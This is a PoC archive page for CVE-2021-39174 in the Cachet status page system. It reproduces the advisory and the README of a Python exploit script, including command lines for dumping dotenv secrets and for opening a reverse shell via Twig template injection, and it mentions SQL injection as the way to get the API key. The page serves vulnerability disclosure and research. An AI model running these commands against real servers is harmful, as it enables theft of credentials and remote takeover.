Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-39174 PoC — Configuration leak

Source
https://github.com/hadrian3689/cachet_2.4.0-dev
Associated Vulnerability
Title:Configuration leak (CVE-2021-39174)
Description:Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.
Description
CVE-2021-39174 Cachet 2.4.0-dev
Readme
# CVE-2021-39174 Cachet 2.4.0-dev

A python3 script for CVE-2021-39174 Cachet 2.4.0-dev Information Disclosure and RCE via Twig Server Side Template Injection. For the RCE the API KEY for the user is needed. Check out the Leave Songs link below which covers how to get the API KEY via SQL Injection CVE-2021-39165.

## Getting Started

### Executing program

* Data Extraction
```
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
```

* Reverse Shell
```
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
```

## Help

For help menu:
```
python3 cachet_2.4.0-dev.py -h
```

## Acknowledgments

* [SonarSource](https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection/)
* [Leave Songs](https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html)

## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →